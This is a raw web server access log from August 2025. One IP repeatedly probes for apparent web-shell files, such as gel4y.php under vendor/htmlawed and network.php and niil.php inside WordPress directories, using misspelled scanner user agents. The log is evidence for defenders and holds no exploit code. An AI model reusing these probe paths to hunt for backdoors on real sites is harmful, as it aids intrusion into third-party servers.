94.16.113.252 - - [12/Aug/2025:14:10:17 -0400] "GET /glpi/vendor/network.php HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:14:10:21 -0400] "GET /vendor/htmlawed/htmlawed/gel4y.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:14:10:54 -0400] "GET /cgi-bin/inputs.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:14:11:26 -0400] "GET /helpdesk//vendor/htmlawed/htmlawed/gel4y.php HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
149.50.215.205 - - [12/Aug/2025:14:11:55 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
209.38.125.40 - - [12/Aug/2025:14:11:55 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.22.91.139 - - [12/Aug/2025:14:11:55 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
156.146.41.214 - - [12/Aug/2025:14:11:55 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
94.16.113.252 - - [12/Aug/2025:14:11:59 -0400] "GET /wp-includes/sodium_compat/src/Core/Curve25519/Ge/network.php HTTP/1.1" 301 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:14:12:12 -0400] "GET /repeater.php HTTP/1.1" 301 247 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
24.199.103.196 - - [12/Aug/2025:14:12:16 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0"
24.199.103.196 - - [12/Aug/2025:14:12:16 -0400] "GET /favicon.ico HTTP/1.1" 301 242 "http://orthosquare.in/" "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0"
94.16.113.252 - - [12/Aug/2025:14:12:18 -0400] "GET /test.php HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:14:12:41 -0400] "GET /themes.php HTTP/1.1" 301 245 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:14:13:13 -0400] "GET /wp-includes/css/dist/niil.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
